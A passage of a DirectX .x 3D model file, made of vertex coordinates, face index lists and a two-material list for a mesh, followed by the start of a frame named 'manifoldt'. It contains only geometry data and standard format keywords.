-0.323077;0.418287;-1.286333;, -0.326191;0.422218;-1.286023;, -0.329091;0.382315;-1.213737;, -0.310326;0.382315;-1.223785;, -0.311801;0.383961;-1.238639;, -0.340636;0.383961;-1.223197;, -0.308490;0.376430;-1.219032;, -0.326151;0.376430;-1.209575;, -0.326151;0.367279;-1.209575;, -0.308490;0.367279;-1.219032;, -0.350713;0.382315;-1.174496;, -0.344551;0.382315;-1.194869;, -0.356097;0.383961;-1.204329;, -0.365566;0.383961;-1.173021;, -0.339892;0.376430;-1.192804;, -0.345690;0.376430;-1.173630;, -0.345690;0.367279;-1.173630;, -0.339892;0.367279;-1.192804;, -0.338255;0.382315;-1.131457;, -0.348303;0.382315;-1.150219;, -0.363156;0.383961;-1.148746;, -0.347715;0.383961;-1.119912;, -0.343550;0.376430;-1.152055;, -0.334093;0.376430;-1.134396;, -0.334093;0.367279;-1.134396;, -0.343550;0.367279;-1.152055;, -0.299014;0.382315;-1.109833;, -0.319386;0.382315;-1.115996;, -0.328847;0.383961;-1.104451;, -0.297539;0.383961;-1.094981;, -0.317321;0.376430;-1.120655;, -0.298148;0.376430;-1.114854;, -0.298148;0.367279;-1.114854;, -0.317321;0.367279;-1.120655;, -0.255975;0.382315;-1.122292;, -0.274737;0.382315;-1.112243;, -0.273264;0.383961;-1.097390;, -0.244431;0.383961;-1.112831;, -0.276573;0.376430;-1.116998;, -0.258914;0.376430;-1.126453;, -0.258914;0.367279;-1.126453;, -0.276573;0.367279;-1.116998;, -0.234351;0.382315;-1.161533;, -0.240514;0.382315;-1.141161;, -0.228970;0.383961;-1.131701;, -0.219500;0.383961;-1.163008;, -0.245173;0.376430;-1.143225;, -0.239372;0.376430;-1.162398;, -0.239372;0.367279;-1.162398;, -0.245173;0.367279;-1.143225;, -0.267742;0.376430;-1.215374;, -0.286916;0.376430;-1.221173;, -0.286916;0.367279;-1.221173;, -0.267742;0.367279;-1.215374;, -0.286050;0.382315;-1.226195;, -0.265679;0.382315;-1.220033;, -0.256218;0.383961;-1.231577;, -0.287527;0.383961;-1.241048;, -0.246809;0.382315;-1.204571;, -0.236762;0.382315;-1.185809;, -0.221910;0.383961;-1.187283;, -0.237350;0.383961;-1.216117;, -0.241515;0.376430;-1.183973;, -0.250971;0.376430;-1.201632;, -0.250971;0.367279;-1.201632;, -0.241515;0.367279;-1.183973;, -0.267742;0.324827;-1.215374;, -0.286916;0.324827;-1.221173;, -0.284330;0.318046;-1.195129;, -0.308490;0.324827;-1.219032;, -0.326151;0.324827;-1.209575;, -0.305905;0.318046;-1.192986;, -0.339892;0.324827;-1.192804;, -0.345690;0.324827;-1.173630;, -0.319647;0.318046;-1.176217;, -0.343550;0.324827;-1.152055;, -0.334093;0.324827;-1.134396;, -0.317505;0.318046;-1.154641;, -0.317321;0.324827;-1.120655;, -0.298148;0.324827;-1.114854;, -0.300735;0.318046;-1.140899;, -0.276573;0.324827;-1.116998;, -0.258914;0.324827;-1.126453;, -0.279159;0.318046;-1.143041;, -0.245173;0.324827;-1.143225;, -0.239372;0.324827;-1.162398;, -0.265417;0.318046;-1.159812;, -0.241515;0.324827;-1.183973;, -0.250971;0.324827;-1.201632;, -0.267560;0.318046;-1.181387;, -0.276573;0.352540;-1.116998;, -0.258914;0.352540;-1.126453;, -0.258914;0.338389;-1.126453;, -0.276573;0.338389;-1.116998;, -0.245173;0.352540;-1.143225;, -0.239372;0.352540;-1.162398;, -0.239372;0.338389;-1.162398;, -0.245173;0.338389;-1.143225;, -0.241515;0.352540;-1.183973;, -0.250971;0.352540;-1.201632;, -0.250971;0.338389;-1.201632;, -0.241515;0.338389;-1.183973;, -0.267742;0.352540;-1.215374;, -0.286916;0.352540;-1.221173;, -0.286916;0.338389;-1.221173;, -0.267742;0.338389;-1.215374;, -0.308490;0.352540;-1.219032;, -0.326151;0.352540;-1.209575;, -0.326151;0.338389;-1.209575;, -0.308490;0.338389;-1.219032;, -0.339892;0.352540;-1.192804;, -0.345690;0.352540;-1.173630;, -0.345690;0.338389;-1.173630;, -0.339892;0.338389;-1.192804;, -0.343550;0.352540;-1.152055;, -0.334093;0.352540;-1.134396;, -0.334093;0.338389;-1.134396;, -0.343550;0.338389;-1.152055;, -0.317321;0.352540;-1.120655;, -0.298148;0.352540;-1.114854;, -0.298148;0.338389;-1.114854;, -0.317321;0.338389;-1.120655;, -0.341158;0.381954;-1.193842;, -0.347322;0.381954;-1.173470;, -0.345690;0.379993;-1.173630;, -0.339892;0.379993;-1.192804;, -0.345180;0.381954;-1.151893;, -0.335130;0.381954;-1.133131;, -0.334093;0.379993;-1.134396;, -0.343550;0.379993;-1.152055;, -0.318359;0.381954;-1.119389;, -0.297988;0.381954;-1.113226;, -0.298148;0.379993;-1.114854;, -0.317321;0.379993;-1.120655;, -0.276412;0.381954;-1.115367;, -0.257649;0.381954;-1.125416;, -0.258914;0.379993;-1.126453;, -0.276573;0.379993;-1.116998;, -0.243907;0.381954;-1.142187;, -0.237744;0.381954;-1.162560;, -0.239372;0.379993;-1.162398;, -0.245173;0.379993;-1.143225;, -0.239885;0.381954;-1.184136;, -0.249933;0.381954;-1.202899;, -0.250971;0.379993;-1.201632;, -0.241515;0.379993;-1.183973;, -0.266705;0.381954;-1.216641;, -0.287078;0.381954;-1.222802;, -0.286916;0.379993;-1.221173;, -0.267742;0.379993;-1.215374;, -0.308652;0.381954;-1.220661;, -0.327416;0.381954;-1.210613;, -0.326151;0.379993;-1.209575;, -0.308490;0.379993;-1.219032;, -0.181159;0.390793;-1.202391;, -0.202188;0.390793;-1.241659;, -0.211989;0.386892;-1.229697;, -0.196549;0.386892;-1.200863;, -0.238087;0.390793;-1.271075;, -0.280725;0.390793;-1.283973;, -0.279198;0.386892;-1.268582;, -0.247890;0.386892;-1.259113;, -0.326909;0.390793;-1.279387;, -0.366178;0.390793;-1.258358;, -0.354216;0.386892;-1.248556;, -0.325381;0.386892;-1.263997;, -0.395592;0.390793;-1.222460;, -0.408490;0.390793;-1.179823;, -0.393100;0.386892;-1.181351;, -0.383629;0.386892;-1.212657;, -0.403905;0.390793;-1.133637;, -0.382876;0.390793;-1.094369;, -0.373074;0.386892;-1.106331;, -0.388515;0.386892;-1.135166;, -0.346978;0.390793;-1.064954;, -0.304340;0.390793;-1.052057;, -0.305867;0.386892;-1.067446;, -0.337175;0.386892;-1.076916;, -0.258154;0.390793;-1.056642;, -0.218887;0.390793;-1.077670;, -0.230848;0.386892;-1.087473;, -0.259685;0.386892;-1.072032;, -0.189472;0.390793;-1.113570;, -0.176574;0.390793;-1.156207;, -0.191964;0.386892;-1.154680;, -0.201435;0.386892;-1.123372;, -0.349722;0.416337;-1.058757;, -0.305490;0.416337;-1.045377;, -0.305703;0.395665;-1.047544;, -0.348342;0.395665;-1.060441;, -0.255715;0.416337;-1.050319;, -0.214977;0.416337;-1.072134;, -0.216661;0.395665;-1.073514;, -0.255930;0.395665;-1.052486;, -0.183275;0.416337;-1.110825;, -0.169897;0.416337;-1.155057;, -0.172062;0.395665;-1.154843;, -0.184959;0.395665;-1.112205;, -0.174839;0.416337;-1.204830;, -0.196652;0.416337;-1.245568;, -0.198034;0.395665;-1.243885;, -0.177003;0.395665;-1.204616;, -0.235343;0.416337;-1.277271;, -0.263198;0.416337;-1.292276;, -0.279574;0.403637;-1.290651;, -0.279359;0.395665;-1.288484;, -0.236722;0.395665;-1.275587;, -0.345726;0.416337;-1.284085;, -0.370086;0.416337;-1.263894;, -0.368402;0.395665;-1.262514;, -0.329135;0.395665;-1.283543;, -0.329349;0.403637;-1.285710;, -0.401788;0.416337;-1.225203;, -0.415169;0.416337;-1.180971;, -0.413002;0.395665;-1.181187;, -0.400105;0.395665;-1.223824;, -0.410227;0.416337;-1.131198;, -0.388412;0.416337;-1.090460;, -0.387032;0.395665;-1.092143;, -0.408061;0.395665;-1.131413;, -0.329349;0.472296;-1.285710;, -0.370086;0.472296;-1.263894;, -0.370086;0.452809;-1.263894;, -0.345726;0.452809;-1.284085;, -0.329349;0.465510;-1.285710;, -0.401788;0.472296;-1.225203;, -0.415169;0.472296;-1.180971;, -0.415169;0.452809;-1.180971;, -0.401788;0.452809;-1.225203;, -0.410227;0.472296;-1.131198;, -0.388412;0.472296;-1.090460;, -0.388412;0.452809;-1.090460;, -0.410227;0.452809;-1.131198;, -0.349722;0.472296;-1.058757;, -0.305490;0.472296;-1.045377;, -0.305490;0.452809;-1.045377;, -0.349722;0.452809;-1.058757;, -0.255715;0.472296;-1.050319;, -0.214977;0.472296;-1.072134;, -0.214977;0.452809;-1.072134;, -0.255715;0.452809;-1.050319;, -0.183275;0.472296;-1.110825;, -0.169897;0.472296;-1.155057;, -0.169897;0.452809;-1.155057;, -0.183275;0.452809;-1.110825;, -0.174839;0.472296;-1.204830;, -0.196652;0.472296;-1.245568;, -0.196652;0.452809;-1.245568;, -0.174839;0.452809;-1.204830;, -0.235343;0.472296;-1.277271;, -0.279574;0.472296;-1.290651;, -0.279574;0.465510;-1.290651;, -0.263198;0.452809;-1.292276;, -0.235343;0.452809;-1.277271;, -0.182003;0.476049;-1.109781;, -0.168257;0.476049;-1.155220;, -0.169897;0.474798;-1.155057;, -0.183275;0.474798;-1.110825;, -0.173201;0.476049;-1.204995;, -0.195610;0.476049;-1.246842;, -0.196652;0.474798;-1.245568;, -0.174839;0.474798;-1.204830;, -0.234299;0.476049;-1.278544;, -0.279738;0.476049;-1.292289;, -0.279574;0.474798;-1.290651;, -0.235343;0.474798;-1.277271;, -0.329513;0.476049;-1.287347;, -0.371359;0.476049;-1.264937;, -0.370086;0.474798;-1.263894;, -0.329349;0.474798;-1.285710;, -0.403061;0.476049;-1.226247;, -0.416807;0.476049;-1.180808;, -0.415169;0.474798;-1.180971;, -0.401788;0.474798;-1.225203;, -0.411865;0.476049;-1.131035;, -0.389454;0.476049;-1.089186;, -0.388412;0.474798;-1.090460;, -0.410227;0.474798;-1.131198;, -0.350765;0.476049;-1.057484;, -0.305327;0.476049;-1.043741;, -0.305490;0.474798;-1.045377;, -0.349722;0.474798;-1.058757;, -0.255553;0.476049;-1.048682;, -0.213705;0.476049;-1.071091;, -0.214977;0.474798;-1.072134;, -0.255715;0.474798;-1.050319;, -0.416645;0.476904;-1.129190;, -0.393639;0.476904;-1.086231;, -0.392595;0.476049;-1.087505;, -0.415005;0.476049;-1.129352;, -0.352839;0.476904;-1.052801;, -0.306195;0.476904;-1.038692;, -0.306358;0.476049;-1.040331;, -0.351796;0.476049;-1.054074;, -0.253708;0.476904;-1.043903;, -0.210749;0.476904;-1.066907;, -0.212023;0.476049;-1.067952;, -0.253870;0.476049;-1.045541;, -0.177320;0.476904;-1.107707;, -0.163210;0.476904;-1.154351;, -0.164848;0.476049;-1.154188;, -0.178591;0.476049;-1.108750;, -0.168419;0.476904;-1.206839;, -0.191425;0.476904;-1.249797;, -0.192468;0.476049;-1.248524;, -0.170058;0.476049;-1.206676;, -0.232225;0.476904;-1.283228;, -0.278869;0.476904;-1.297337;, -0.278707;0.476049;-1.295700;, -0.233267;0.476049;-1.281954;, -0.331357;0.476904;-1.292125;, -0.374316;0.476904;-1.269121;, -0.373043;0.476049;-1.268078;, -0.331194;0.476049;-1.290488;, -0.407745;0.476904;-1.228321;, -0.421855;0.476904;-1.181678;, -0.420217;0.476049;-1.181840;, -0.406472;0.476049;-1.227278;, -0.421855;0.478616;-1.181678;, -0.407745;0.478616;-1.228321;, -0.416645;0.478616;-1.129190;, -0.352839;0.478616;-1.052801;, -0.253708;0.478616;-1.043903;, -0.163210;0.478616;-1.154351;, -0.191425;0.478616;-1.249797;, -0.168419;0.478616;-1.206839;, -0.278869;0.478616;-1.297337;, -0.232225;0.478616;-1.283230;, -0.331357;0.478616;-1.292120;, -0.374316;0.478616;-1.269120;, -0.393639;0.478616;-1.086230;, -0.306195;0.478616;-1.038690;, -0.210749;0.478616;-1.066910;, -0.177320;0.478616;-1.107710;; 450; 4;427,445,443,424;, 4;431,436,446,428;, 4;403,437,435,432;, 4;407,438,447,404;, 4;411,439,448,408;, 4;415,450,449,412;, 4;419,442,440,416;, 4;423,444,441,420;, 4;423,424,443,444;, 4;427,428,446,445;, 4;431,432,435,436;, 4;403,404,447,437;, 4;407,408,448,438;, 4;411,412,449,439;, 4;415,416,440,450;, 4;419,420,441,442;, 4;72,71,74,73;, 4;74,71,68,69;, 4;68,67,70,69;, 4;70,67,64,65;, 4;64,63,66,65;, 4;10,11,65,66;, 4;14,70,65,11;, 4;14,15,69,70;, 4;18,74,69,15;, 4;18,19,73,74;, 4;22,78,73,19;, 4;22,23,77,78;, 4;76,75,78,77;, 4;78,75,72,73;, 4;34,31,76,77;, 4;25,34,77,23;, 4;25,26,33,34;, 4;32,31,34,33;, 4;38,35,32,33;, 4;27,38,33,26;, 4;27,28,37,38;, 4;36,35,38,37;, 4;42,39,36,37;, 4;29,42,37,28;, 4;29,30,41,42;, 4;40,39,42,41;, 4;46,43,40,41;, 4;0,46,41,30;, 4;0,1,45,46;, 4;44,43,46,45;, 4;50,47,44,45;, 4;2,50,45,1;, 4;2,3,49,50;, 4;48,47,50,49;, 4;54,51,48,49;, 4;4,54,49,3;, 4;4,5,53,54;, 4;52,51,54,53;, 4;58,55,52,53;, 4;6,58,53,5;, 4;6,7,57,58;, 4;56,55,58,57;, 4;62,59,56,57;, 4;8,62,57,7;, 4;8,9,61,62;, 4;60,59,62,61;, 4;66,63,60,61;, 4;10,66,61,9;, 4;11,10,13,12;, 4;17,14,11,12;, 4;15,14,17,16;, 4;21,18,15,16;, 4;19,18,21,20;, 4;24,22,19,20;, 3;369,366,370;, 3;367,366,369;, 3;367,369,368;, 4;107,108,368,369;, 3;107,369,100;, 4;100,369,320,98;, 3;98,320,104;, 4;103,104,320,321;, 3;320,322,321;, 3;320,323,322;, 3;323,320,319;, 4;319,320,369,370;, 4;319,370,364,316;, 4;370,366,363,364;, 4;366,382,377,363;, 4;366,367,381,382;, 4;337,386,381,367;, 4;341,337,367,368;, 4;82,341,368,80;, 3;80,368,108;, 3;80,79,81;, 4;31,32,81,79;, 4;31,79,109,76;, 4;75,76,109,110;, 4;75,110,101,72;, 4;71,72,101,102;, 4;71,102,99,68;, 4;67,68,99,97;, 4;67,97,105,64;, 4;63,64,105,106;, 4;63,106,95,60;, 4;59,60,95,96;, 3;95,94,96;, 4;96,94,92,93;, 4;59,96,93,56;, 4;55,56,93,91;, 3;92,91,93;, 3;92,328,116;, 4;115,116,328,324;, 3;327,324,328;, 3;326,324,327;, 3;324,326,325;, 4;324,325,339,340;, 3;338,340,339;, 3;338,337,340;, 3;340,337,341;, 4;111,112,340,341;, 3;111,341,82;, 3;83,82,84;, 4;35,36,83,84;, 4;39,114,83,36;, 4;39,40,113,114;, 4;43,85,113,40;, 4;43,44,87,85;, 4;47,90,87,44;, 4;47,48,89,90;, 4;51,118,89,48;, 4;118,115,88,89;, 3;89,88,90;, 4;90,88,86,87;, 3;86,85,87;, 4;85,86,112,113;, 3;86,340,112;, 4;88,324,340,86;, 3;115,324,88;, 4;51,52,117,118;, 4;55,91,117,52;, 4;94,321,328,92;, 3;103,321,94;, 4;327,328,321,322;, 4;279,327,322,276;, 4;275,276,322,323;, 4;276,275,278,277;, 4;282,279,276,277;, 4;280,279,282,281;, 4;279,280,326,327;, 4;283,332,326,280;, 4;332,329,325,326;, 4;329,345,339,325;, 4;345,342,338,339;, 4;342,390,385,338;, 4;337,338,385,386;, 4;84,82,80,81;, 4;35,84,81,32;, 4;110,107,100,101;, 3;101,100,102;, 4;102,100,98,99;, 3;98,97,99;, 4;97,98,104,105;, 4;323,319,316,317;, 4;275,323,317,272;, 4;278,275,272,273;, 4;272,271,274,273;, 4;271,272,317,318;, 4;316,315,318,317;, 4;315,316,364,365;, 4;363,362,365,364;, 4;362,363,377,378;, 4;362,378,373,359;, 4;365,362,359,360;, 4;315,365,360,312;, 4;318,315,312,313;, 4;271,318,313,300;, 4;274,271,300,301;, 4;312,311,314,313;, 4;311,312,360,361;, 4;359,358,361,360;, 4;358,359,373,374;, 4;358,374,401,355;, 4;361,358,355,356;, 4;311,361,356,308;, 4;314,311,308,309;, 4;308,307,310,309;, 4;307,308,356,357;, 4;355,354,357,356;, 4;354,355,401,402;, 4;354,402,397,351;, 4;357,354,351,352;, 4;307,357,352,304;, 4;310,307,304,305;, 4;295,310,305,292;, 4;291,292,305,306;, 4;304,303,306,305;, 4;303,304,352,353;, 4;351,350,353,352;, 4;350,351,397,398;, 4;350,398,393,347;, 4;353,350,347,348;, 4;303,353,348,334;, 4;306,303,334,335;, 4;291,306,335,288;, 4;294,291,288,289;, 4;288,287,290,289;, 4;287,288,335,336;, 4;334,333,336,335;, 4;333,334,348,349;, 4;347,346,349,348;, 4;346,347,393,394;, 4;346,394,389,343;, 4;349,346,343,344;, 4;333,349,344,330;, 4;336,333,330,331;, 4;287,336,331,284;, 4;290,287,284,285;, 4;284,283,286,285;, 4;283,284,331,332;, 4;330,329,332,331;, 4;329,330,344,345;, 4;343,342,345,344;, 4;342,343,389,390;, 4;286,283,280,281;, 4;292,291,294,293;, 4;298,295,292,293;, 4;296,295,298,297;, 4;295,296,309,310;, 3;110,108,107;, 3;108,110,109;, 4;79,80,108,109;, 4;422,419,416,417;, 4;416,415,418,417;, 4;371,372,417,418;, 4;375,422,417,372;, 4;378,375,372,373;, 4;372,371,374,373;, 4;374,371,400,401;, 4;371,418,413,400;, 4;418,415,412,413;, 4;412,411,414,413;, 4;399,400,413,414;, 4;400,399,402,401;, 4;402,399,396,397;, 4;399,414,409,396;, 4;414,411,408,409;, 4;408,407,410,409;, 4;395,396,409,410;, 4;396,395,398,397;, 4;398,395,392,393;, 4;395,410,405,392;, 4;410,407,404,405;, 4;404,403,406,405;, 4;391,392,405,406;, 4;392,391,394,393;, 4;394,391,388,389;, 4;391,406,433,388;, 4;406,403,432,433;, 4;432,431,434,433;, 4;387,388,433,434;, 4;388,387,390,389;, 4;390,387,384,385;, 4;387,434,429,384;, 4;434,431,428,429;, 4;428,427,430,429;, 4;383,384,429,430;, 4;384,383,386,385;, 4;386,383,380,381;, 4;383,430,425,380;, 4;430,427,424,425;, 4;424,423,426,425;, 4;379,380,425,426;, 4;380,379,382,381;, 4;382,379,376,377;, 4;379,426,421,376;, 4;426,423,420,421;, 4;420,419,422,421;, 4;375,376,421,422;, 4;376,375,378,377;, 3;104,103,105;, 3;105,103,106;, 4;106,103,94,95;, 4;114,111,82,83;, 3;113,111,114;, 3;112,111,113;, 4;91,92,116,117;, 3;116,118,117;, 3;118,116,115;, 4;299,300,313,314;, 4;300,299,302,301;, 4;302,299,296,297;, 4;299,314,309,296;, 4;297,154,161,302;, 4;161,162,301,302;, 4;301,162,177,274;, 4;177,178,273,274;, 4;273,178,173,278;, 4;172,173,178,175;, 4;172,175,260,263;, 4;259,260,175,176;, 4;176,159,256,259;, 4;255,256,159,160;, 4;160,151,252,255;, 4;160,161,154,151;, 4;160,159,162,161;, 4;176,177,162,159;, 4;176,175,178,177;, 4;263,264,171,172;, 4;172,171,174,173;, 4;173,174,277,278;, 4;277,174,121,282;, 4;120,121,174,171;, 4;120,171,264,267;, 4;267,268,119,120;, 4;120,119,122,121;, 4;121,122,281,282;, 4;281,122,129,286;, 4;128,129,122,119;, 4;128,119,268,239;, 4;239,240,127,128;, 4;128,127,130,129;, 4;136,137,130,127;, 4;136,127,240,243;, 4;243,244,135,136;, 4;136,135,138,137;, 4;137,138,289,290;, 4;285,130,137,290;, 4;129,130,285,286;, 4;144,145,138,135;, 4;144,135,244,247;, 4;247,248,143,144;, 4;144,143,146,145;, 4;145,146,293,294;, 4;289,138,145,294;, 4;152,143,248,251;, 4;152,153,146,143;, 4;293,146,153,298;, 4;153,154,297,298;, 4;152,151,154,153;, 4;251,252,151,152;, 4;262,259,256,257;, 4;256,255,258,257;, 4;257,258,163,164;, 4;164,163,166,165;, 4;211,212,165,166;, 4;212,211,214,213;, 4;201,202,213,214;, 4;204,218,213,202;, 4;218,215,212,213;, 4;215,182,165,212;, 4;182,179,164,165;, 4;262,257,164,179;, 4;261,262,179,180;, 4;180,179,182,181;, 4;215,216,181,182;, 4;216,215,218,217;, 4;204,205,217,218;, 4;183,222,217,205;, 4;222,219,216,217;, 4;219,170,181,216;, 4;170,167,180,181;, 4;266,261,180,167;, 4;266,263,260,261;, 4;260,259,262,261;, 4;264,263,266,265;, 4;265,266,167,168;, 4;168,167,170,169;, 4;219,220,169,170;, 4;220,219,222,221;, 4;183,184,221,222;, 4;186,226,221,184;, 4;226,223,220,221;, 4;223,126,169,220;, 4;126,123,168,169;, 4;270,265,168,123;, 4;270,267,264,265;, 4;268,267,270,269;, 4;269,270,123,124;, 4;124,123,126,125;, 4;223,224,125,126;, 4;224,223,226,225;, 4;186,187,225,226;, 4;189,230,225,187;, 4;230,227,224,225;, 4;227,134,125,224;, 4;134,131,124,125;, 4;242,269,124,131;, 4;242,239,268,269;, 4;240,239,242,241;, 4;241,242,131,132;, 4;132,131,134,133;, 4;227,228,133,134;, 4;228,227,230,229;, 4;189,190,229,230;, 4;192,234,229,190;, 4;234,231,228,229;, 4;231,142,133,228;, 4;142,139,132,133;, 4;246,241,132,139;, 4;246,243,240,241;, 4;244,243,246,245;, 4;245,246,139,140;, 4;140,139,142,141;, 4;231,232,141,142;, 4;232,231,234,233;, 4;192,193,233,234;, 4;195,238,233,193;, 4;238,235,232,233;, 4;235,150,141,232;, 4;150,147,140,141;, 4;250,245,140,147;, 4;250,247,244,245;, 4;248,247,250,249;, 4;249,250,147,148;, 4;148,147,150,149;, 4;235,236,149,150;, 4;236,235,238,237;, 4;195,196,237,238;, 4;198,210,237,196;, 4;210,207,236,237;, 4;207,158,149,236;, 4;158,155,148,149;, 4;254,249,148,155;, 4;254,251,248,249;, 4;252,251,254,253;, 4;253,254,155,156;, 4;156,155,158,157;, 4;207,208,157,158;, 4;208,207,210,209;, 4;198,199,209,210;, 4;201,214,209,199;, 4;214,211,208,209;, 4;211,166,157,208;, 4;166,163,156,157;, 4;258,253,156,163;, 4;258,255,252,253;, 3;184,183,185;, 4;188,186,184,185;, 3;187,186,188;, 4;191,189,187,188;, 8;191,188,185,206,203,200,197,194;, 4;206,204,202,203;, 3;205,204,206;, 4;185,183,205,206;, 3;202,201,203;, 4;203,201,199,200;, 3;199,198,200;, 4;200,198,196,197;, 3;196,195,197;, 4;197,195,193,194;, 3;193,192,194;, 4;194,192,190,191;, 3;190,189,191;; MeshMaterialList { 2; 450; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;, 1;; Material { 0.000000;0.000000;0.000000;1.0;; 60.0; 0.000000;0.000000;0.000000;; 0.000000;0.000000;0.000000;; } # Material Material { 0.498039;0.498039;0.498039;1.0;; 60.0; 0.000000;0.000000;0.000000;; 0.000000;0.000000;0.000000;; } # Material } # MeshMaterialList } # Mesh } # Frame _distribu Frame _manifoldt { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh manifoldt { 1341; -0.910880;0.900008;-1.027027;, -0.910875;0.900008;-0.923359;, -0.873843;0.909931;-1.027027;, -0.873841;0.909931;-0.923360;, -0.840534;0.937044;-1.027029;, -0.840532;0.937044;-0.923362;, -0.794230;0.974080;-1.027030;, -0.794228;0.974080;-0.923362;, -0.840534;1.011116;-1.027029;, -0.840532;1.011116;-0.923362;, -0.873843;1.038228;-1.027027;, -0.873841;1.038228;-0.923360;, -0.910880;1.048151;-1.027027;, -0.910875;1.048151;-0.923359;, -0.947916;1.038228;-1.027026;, -0.947912;1.038228;-0.923358;, -0.975028;1.011116;-1.027025;, -0.975025;1.011116;-0.923358;, -0.984951;0.974080;-1.027025;, -0.984948;0.974080;-0.923358;, -0.975028;0.937044;-1.027025;, -0.975025;0.937044;-0.923358;, -0.947916;0.909931;-1.027026;, -0.947912;0.909931;-0.923358;, -0.802859;0.986425;-1.027030;, -0.826155;0.996518;-1.027028;, -0.826155;0.951641;-1.027028;, -0.802859;0.961734;-1.027030;, -0.826151;0.996518;-0.923362;, -0.802857;0.986425;-0.923362;, -0.802857;0.961734;-0.923362;, -0.826151;0.951641;-0.923362;, -0.814451;0.990432;-1.027029;, -0.814451;0.957728;-1.027029;, -0.814449;0.990432;-0.923362;, -0.814449;0.957728;-0.923362;, -0.796335;0.981796;-1.027030;, -0.796332;0.981796;-0.923362;, -0.796335;0.966363;-1.027030;, -0.796332;0.966363;-0.923362;, -0.876100;0.914558;-1.031250;, -0.910463;0.905351;-1.031248;, -0.944829;0.914558;-1.031247;, -0.969985;0.939715;-1.031247;, -0.979193;0.974080;-1.031246;, -0.969985;1.008444;-1.031247;, -0.944829;1.033601;-1.031247;, -0.910463;1.042809;-1.031248;, -0.876100;1.033601;-1.031250;, -0.845192;1.008444;-1.031250;, -0.831851;0.994900;-1.031251;, -0.820992;0.989252;-1.031251;, -0.810236;0.985534;-1.031251;, -0.804183;0.981239;-1.031251;, -0.802228;0.974080;-1.031252;, -0.804183;0.966920;-1.031251;, -0.810236;0.962625;-1.031251;, -0.820992;0.958907;-1.031251;, -0.831851;0.953259;-1.031251;, -0.845192;0.939715;-1.031250;, -0.812914;0.973002;-0.976521;, -0.812916;0.973002;-1.049580;, -0.818190;0.963866;-0.976520;, -0.818191;0.963866;-1.049580;, -0.828738;0.963866;-0.976520;, -0.828741;0.963866;-1.049580;, -0.834013;0.973002;-0.976520;, -0.834015;0.973002;-1.049580;, -0.828738;0.982137;-0.976520;, -0.828741;0.982137;-1.049580;, -0.818190;0.982137;-0.976520;, -0.818191;0.982137;-1.049580;, -1.589015;0.914255;-0.976500;, -1.589016;0.914255;-1.049560;, -1.594289;0.905120;-0.976500;, -1.594291;0.905120;-1.049560;, -1.604838;0.905120;-0.976500;, -1.604840;0.905120;-1.049559;, -1.610112;0.914255;-0.976500;, -1.610114;0.914255;-1.049559;, -1.604838;0.923391;-0.976500;, -1.604840;0.923391;-1.049559;, -1.594289;0.923391;-0.976500;, -1.594291;0.923391;-1.049560;, -1.536087;0.824646;-1.023777;, 